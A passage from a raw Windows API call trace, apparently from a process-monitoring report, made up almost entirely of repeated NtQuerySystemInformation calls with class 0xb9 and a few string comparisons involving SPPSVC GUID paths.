SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0230.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0230.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0230.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0230.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0230.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x40, ResultLength=0x0) [0230.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x40, ResultLength=0x0) [0230.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x40, ResultLength=0x0) [0230.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x30, ResultLength=0x0) [0230.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x30, ResultLength=0x0) [0230.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd418, Length=0x30, ResultLength=0x0) [0230.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd380, Length=0x38, ResultLength=0x0) [0230.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0230.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0230.260] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0230.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0230.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0230.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0230.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0230.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0230.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0230.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x28, ResultLength=0x0) [0230.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0230.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0230.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0230.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x20, ResultLength=0x0) [0230.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0230.268] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0230.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce60, Length=0x20, ResultLength=0x0) [0230.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0230.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0230.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0230.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0230.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0230.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x40, ResultLength=0x0) [0230.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x40, ResultLength=0x0) [0230.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x40, ResultLength=0x0) [0230.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x30, ResultLength=0x0) [0230.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd510, Length=0x30, ResultLength=0x0) [0230.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd418, Length=0x30, ResultLength=0x0) [0230.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd380, Length=0x38, ResultLength=0x0) [0230.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0230.384] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0230.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0230.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0230.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0230.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0230.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0230.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x28, ResultLength=0x0) [0230.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0230.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0230.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0230.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0230.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0230.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0230.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0230.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0230.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0230.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0230.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0230.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0230.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0230.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0230.396] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0230.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0230.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0230.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x50, ResultLength=0x0) [0230.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0230.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0230.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0230.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x28, ResultLength=0x0) [0230.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x28, ResultLength=0x0) [0230.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0230.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0230.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x28, ResultLength=0x0) [0230.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0230.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0230.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0230.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0230.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0230.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0230.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0230.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0230.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0230.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x50, ResultLength=0x0) [0230.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x50, ResultLength=0x0) [0230.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x50, ResultLength=0x0) [0230.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x50, ResultLength=0x0) [0230.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x50, ResultLength=0x0) [0230.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcee0, Length=0x50, ResultLength=0x0) [0230.410] NtQuerySystemInformation 